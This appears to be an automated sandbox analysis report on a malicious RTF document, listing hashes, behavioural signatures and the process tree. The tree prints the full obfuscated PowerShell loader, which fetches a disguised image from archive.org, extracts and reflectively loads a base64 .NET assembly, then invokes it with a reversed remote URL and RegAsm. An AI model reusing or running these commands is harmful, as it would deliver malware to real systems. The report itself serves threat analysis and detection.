Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-10-2024 13:24
Static task
static1
Behavioral task
behavioral1
Sample
f31ba8351265a427efdf3b2d24ec6fab.rtf
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f31ba8351265a427efdf3b2d24ec6fab.rtf
Resource
win10v2004-20241007-en
General
-
Target
f31ba8351265a427efdf3b2d24ec6fab.rtf
-
Size
97KB
-
MD5
f31ba8351265a427efdf3b2d24ec6fab
-
SHA1
0dc5a1c62306ff5e581a15408edc7ea15433a6d2
-
SHA256
55ba7cdf4f44829fb470c66da2e831fe28596a2fcc33b74c0f8f6117786af040
-
SHA512
1d70947a6fd849db0df28e79ed830a40355c569b4a89cf7e135deed8077f9089f5f4d3f61ea416537895204e24abf2fcc11406385e600d8410e349a1d06ffd20
-
SSDEEP
768:uUz5t/tJy06YV+K2IzBG3ZuE6dHscUgoFixYv9bqsRe:u4Zz4Y4zPJuLdHscUgiixa2
Malware Config
Extracted
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 3 2984 EQNEDT32.EXE 7 2660 powershell.exe 8 2660 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2680 powershell.exe 2660 powershell.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
EQNEDT32.EXEWScript.exepowershell.exepowershell.exeWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2668 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2680 powershell.exe 2660 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 2660 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2668 WINWORD.EXE 2668 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXEdescription pid process target process PID 2984 wrote to memory of 2580 2984 EQNEDT32.EXE WScript.exe PID 2984 wrote to memory of 2580 2984 EQNEDT32.EXE WScript.exe PID 2984 wrote to memory of 2580 2984 EQNEDT32.EXE WScript.exe PID 2984 wrote to memory of 2580 2984 EQNEDT32.EXE WScript.exe PID 2580 wrote to memory of 2680 2580 WScript.exe powershell.exe PID 2580 wrote to memory of 2680 2580 WScript.exe powershell.exe PID 2580 wrote to memory of 2680 2580 WScript.exe powershell.exe PID 2580 wrote to memory of 2680 2580 WScript.exe powershell.exe PID 2680 wrote to memory of 2660 2680 powershell.exe powershell.exe PID 2680 wrote to memory of 2660 2680 powershell.exe powershell.exe PID 2680 wrote to memory of 2660 2680 powershell.exe powershell.exe PID 2680 wrote to memory of 2660 2680 powershell.exe powershell.exe PID 2668 wrote to memory of 336 2668 WINWORD.EXE splwow64.exe PID 2668 wrote to memory of 336 2668 WINWORD.EXE splwow64.exe PID 2668 wrote to memory of 336 2668 WINWORD.EXE splwow64.exe PID 2668 wrote to memory of 336 2668 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f31ba8351265a427efdf3b2d24ec6fab.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:336
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\servicegoodfornaturalthinggood.vbS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRQc0hvbWVbNF0rJHBTSE9NRVszNF0rJ1gnKSAoICgnY0dmaW1hZ2VVcmwgPSBBekVodHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyLycrJ2l0ZW1zL2RldGFoJysnLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3RlX1YuanBnIEF6RTtjR2Z3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2NHZmltYWdlQnl0ZXMgPSBjR2Z3ZWJDbGllbnQuRG93bicrJ2xvYWREYXRhKGNHJysnZicrJ2ltYWcnKydlVXJsKTtjR2ZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhjR2ZpbWFnZUInKyd5dGUnKydzKTtjR2ZzdGFydEZsYWcgPSBBekU8PEJBU0U2NF9TVEFSVD4+QXpFO2NHZmVuZEZsYWcgPSBBekU8PEJBU0U2NF9FTkQ+PkF6RTtjR2ZzdGFydCcrJ0luZGV4ID0gY0dmaW1hZ2VUZXh0LkluZGV4T2YoY0dmc3RhcnRGbGFnKTtjR2ZlbmRJbmRleCA9IGNHZmltYWdlVGV4dC5JbmRleE9mKGNHZmVuZEZsYWcpO2NHZnN0YXJ0SW5kZXggLWdlIDAgLWFuZCBjR2ZlbmRJbmRleCAtZycrJ3QgY0dmc3RhcnRJbmRleDtjR2ZzdGFydEluZGV4ICs9IGNHZnMnKyd0YXJ0RmxhZy5MZW5ndGg7Y0dmYmFzZTY0TGVuZ3RoID0gY0cnKydmZW5kSW5kZXggLSBjR2ZzdGFydEluZGV4O2NHZmJhc2U2NENvbW1hbmQgPScrJyBjR2ZpbWFnZVRleHQuJysnU3Vic3RyaW5nKGNHZnN0YXJ0SW5kZXgsIGNHZmJhc2U2NExlbmd0aCk7Y0dmY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhjR2ZiYXNlNjQnKydDb21tYW5kKTtjR2Zsb2FkZWRBc3NlbScrJ2JseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoY0dmY29tbWFuZEJ5dGVzKTtjR2Z2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG8nKydkKEF6RVZBSUF6RSk7Y0dmdmFpTWV0aG9kLkludm9rZShjR2ZudWxsLCBAKEF6RXR4dC5HREZSUlcvMzQzMy8wNy41NjEuNDguMy8vOnB0dGhBekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RVJlJysnZ0FzbUF6RSwgQXpFZGVzYXRpdmFkbycrJ0F6RSwgQXpFZGVzYXRpdmFkb0F6RSkpJysnOycpLnJlcExBY0UoKFtDaGFyXTY1K1tDaGFyXTEyMitbQ2hhcl02OSksW1NUcmlOR11bQ2hhcl0zOSkucmVwTEFjRSgoW0NoYXJdOTkrW0NoYXJdNzErW0NoYXJdMTAyKSxbU1RyaU5HXVtDaGFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PsHome[4]+$pSHOME[34]+'X') ( ('cGfimageUrl = AzEhttps://ia600102.us.archive.org/32/'+'items/detah'+'-note-v_202410/DetahNote_V.jpg AzE;cGfwebClient = New-Object System.Net.WebClient;cGfimageBytes = cGfwebClient.Down'+'loadData(cG'+'f'+'imag'+'eUrl);cGfimageText = [System.Text.Encoding]::UTF8.GetString(cGfimageB'+'yte'+'s);cGfstartFlag = AzE<<BASE64_START>>AzE;cGfendFlag = AzE<<BASE64_END>>AzE;cGfstart'+'Index = cGfimageText.IndexOf(cGfstartFlag);cGfendIndex = cGfimageText.IndexOf(cGfendFlag);cGfstartIndex -ge 0 -and cGfendIndex -g'+'t cGfstartIndex;cGfstartIndex += cGfs'+'tartFlag.Length;cGfbase64Length = cG'+'fendIndex - cGfstartIndex;cGfbase64Command ='+' cGfimageText.'+'Substring(cGfstartIndex, cGfbase64Length);cGfcommandBytes = [System.Convert]::FromBase64String(cGfbase64'+'Command);cGfloadedAssem'+'bly = [System'+'.Reflection.Assembly]::Load(cGfcommandBytes);cGfvaiMethod = [dnlib.IO.Home].GetMetho'+'d(AzEVAIAzE);cGfvaiMethod.Invoke(cGfnull, @(AzEtxt.GDFRRW/3433/07.561.48.3//:ptthAzE, AzEdesativadoAzE, AzEdesativadoAzE, AzEdesativadoAzE, AzERe'+'gAsmAzE, AzEdesativado'+'AzE, AzEdesativadoAzE))'+';').repLAcE(([Char]65+[Char]122+[Char]69),[STriNG][Char]39).repLAcE(([Char]99+[Char]71+[Char]102),[STriNG][Char]36))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50c3429c31c53db2fd9cca7468879fd82
SHA14a7e142cef40a1cd2b765699e140e07604b4044b
SHA256ea9d445e45ed2271c3ecf626143fb2b4d8d16180a4d4d2e0ea3c57cf79306941
SHA512d364aae10bdd4388218f8e536bbea5c993d1e9f16490af1d7ddf89beb026c43d00c900f359bd3ccc5d2f0aa18f1abb5e860d7b13ae3bc615533654d0bf50d0d6
-
Filesize
190KB
MD5b8c00ee73ed137a19e03920a03f80292
SHA1d414493aaa6f1c167409a997f73b0f52fb04c0fa
SHA2560cd60fbe4e65b7cbd036ee3e99507efa509970ab58c632bc49a4bcca2b05bd89
SHA512fa7a2767f17ef3a4a4bfec94f0d3db894ad7d658c582612da295d16e6c970a088a7ee7079798a599847fd49c957f011143e37a5828362c63c0953285839ba3c2